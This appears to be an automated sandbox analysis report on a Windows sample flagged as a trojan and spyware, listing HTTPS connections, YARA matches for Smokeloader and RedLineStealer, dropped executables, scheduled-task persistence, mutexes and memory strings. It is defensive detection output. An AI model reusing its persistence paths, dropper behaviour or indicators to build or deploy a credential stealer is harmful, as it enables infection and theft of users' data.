Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49901 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49908 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:49931 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:49935 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49965 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49970 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49972 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49973 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:49975 version: TLS 1.2
Source: unknown HTTPS traffic detected: 143.204.215.18:443 -> 192.168.2.6:49976 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49981 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49982 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49984 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58881 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58882 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:58885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:59072 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.208.16.95:443 -> 192.168.2.6:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50071 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50304 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50301 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50303 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50300 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50302 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50305 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50307 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50308 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50309 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:54094 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000025.00000002.3001198301.0000000004090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000025.00000002.3000226741.00000000025A0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2400576225.00000000024ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000014.00000002.2835940724.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000014.00000002.2836488033.000000000267E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2401105762.0000000004090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
PE file contains section with special chars
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name:
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name: .idata
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name:
Source: enter[1].exe.0.dr Static PE information: section name: .idata
Source: enter[1].exe.0.dr Static PE information: section name:
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name:
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name: .idata
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: section name:
Source: axplong.exe.6.dr Static PE information: section name:
Source: axplong.exe.6.dr Static PE information: section name: .idata
Source: axplong.exe.6.dr Static PE information: section name:
Source: explorti.exe.9.dr Static PE information: section name:
Source: explorti.exe.9.dr Static PE information: section name: .idata
Source: explorti.exe.9.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB9B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CB9B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB9B8C0 rand_s,NtQueryVirtualMemory, 0_2_6CB9B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB9B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6CB9B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB3F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CB3F280
Creates files inside the system directory
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB335A0 0_2_6CB335A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB934A0 0_2_6CB934A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB9C4A0 0_2_6CB9C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB46C80 0_2_6CB46C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB76CF0 0_2_6CB76CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB3D4E0 0_2_6CB3D4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB5D4D0 0_2_6CB5D4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB464C0 0_2_6CB464C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBA542B 0_2_6CBA542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB75C10 0_2_6CB75C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB82C10 0_2_6CB82C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBAAC00 0_2_6CBAAC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBA545C 0_2_6CBA545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB45440 0_2_6CB45440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB985F0 0_2_6CB985F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB70DD0 0_2_6CB70DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB60512 0_2_6CB60512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB5ED10 0_2_6CB5ED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB4FD00 0_2_6CB4FD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB94EA0 0_2_6CB94EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB55E90 0_2_6CB55E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB9E680 0_2_6CB9E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB3BEF0 0_2_6CB3BEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB4FEF0 0_2_6CB4FEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBA76E3 0_2_6CBA76E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB99E30 0_2_6CB99E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB77E10 0_2_6CB77E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB85600 0_2_6CB85600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB3C670 0_2_6CB3C670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBA6E63 0_2_6CBA6E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB59E50 0_2_6CB59E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB73E50 0_2_6CB73E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB54640 0_2_6CB54640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB82E4E 0_2_6CB82E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB877A0 0_2_6CB877A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB66FF0 0_2_6CB66FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB3DFE0 0_2_6CB3DFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB77710 0_2_6CB77710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB49F00 0_2_6CB49F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB660A0 0_2_6CB660A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB5C0E0 0_2_6CB5C0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB758E0 0_2_6CB758E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBA50C7 0_2_6CBA50C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB7B820 0_2_6CB7B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB84820 0_2_6CB84820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB47810 0_2_6CB47810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB7F070 0_2_6CB7F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB58850 0_2_6CB58850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB5D850 0_2_6CB5D850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB6D9B0 0_2_6CB6D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB3C9A0 0_2_6CB3C9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB75190 0_2_6CB75190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB92990 0_2_6CB92990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB8B970 0_2_6CB8B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBAB170 0_2_6CBAB170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB4D960 0_2_6CB4D960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB5A940 0_2_6CB5A940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB4CAB0 0_2_6CB4CAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBA2AB0 0_2_6CBA2AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB322A0 0_2_6CB322A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB64AA0 0_2_6CB64AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBABA90 0_2_6CBABA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB51AF0 0_2_6CB51AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB7E2F0 0_2_6CB7E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB78AC0 0_2_6CB78AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB79A60 0_2_6CB79A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB3F380 0_2_6CB3F380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBA53C8 0_2_6CBA53C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB7D320 0_2_6CB7D320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB4C370 0_2_6CB4C370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB35340 0_2_6CB35340
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CB6CBE8 appears 133 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CB794D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00404610 appears 316 times
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 2456
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000000.2131986346.0000000002448000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe, 00000000.00000002.2450900392.000000006CDB5000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2447928645.000000006CBC2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000025.00000002.3001198301.0000000004090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000025.00000002.3000226741.00000000025A0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2400576225.00000000024ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000014.00000002.2835940724.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000014.00000002.2836488033.000000000267E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2401105762.0000000004090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.18.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 7ca32398cd.exe.18.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9969505705040872
Source: random[1].exe.0.dr Static PE information: Section: legihfsp ZLIB complexity 0.9944509128166915
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: Section: ZLIB complexity 0.9969505705040872
Source: RoamingBKJEGDGIJE.exe.0.dr Static PE information: Section: legihfsp ZLIB complexity 0.9944509128166915
Source: enter[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9998505806010929
Source: enter[1].exe.0.dr Static PE information: Section: yaomedmc ZLIB complexity 0.9946347539296407
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: Section: ZLIB complexity 0.9998505806010929
Source: RoamingIJEGDBGDBF.exe.0.dr Static PE information: Section: yaomedmc ZLIB complexity 0.9946347539296407
Source: axplong.exe.6.dr Static PE information: Section: ZLIB complexity 0.9969505705040872
Source: axplong.exe.6.dr Static PE information: Section: legihfsp ZLIB complexity 0.9944509128166915
Source: explorti.exe.9.dr Static PE information: Section: ZLIB complexity 0.9998505806010929
Source: explorti.exe.9.dr Static PE information: Section: yaomedmc ZLIB complexity 0.9946347539296407
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@146/292@104/40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB97030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6CB97030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\7XZ4F84C.htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8012
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1336
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4232:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3392:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2036
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49 Jump to behavior
Source: C:\Users\user\1000003002\5aa32fec17.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5175.tmp\5176.tmp\5177.bat C:\Users\user\1000003002\5aa32fec17.exe"
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415887521.00000169CAC6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT * FROM events WHERE timestamp BETWEEN date(:dateFrom) AND date(:dateTo);
Source: file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE events (id INTEGER PRIMARY KEY, type INTEGER NOT NULL, count INTEGER NOT NULL, timestamp DATE );
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: INSERT INTO events (type, count, timestamp) VALUES (:type, 1, date(:date));
Source: file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;;
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;;Fy6
Source: 7ca32398cd.exe, 00000014.00000002.2836006553.000000000266E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT url FROM urls LIMIT 1000Mn;S
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE events SET count = count + 1 WHERE id = :id;-
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT sum(count) FROM events;9'
Source: file.exe, file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
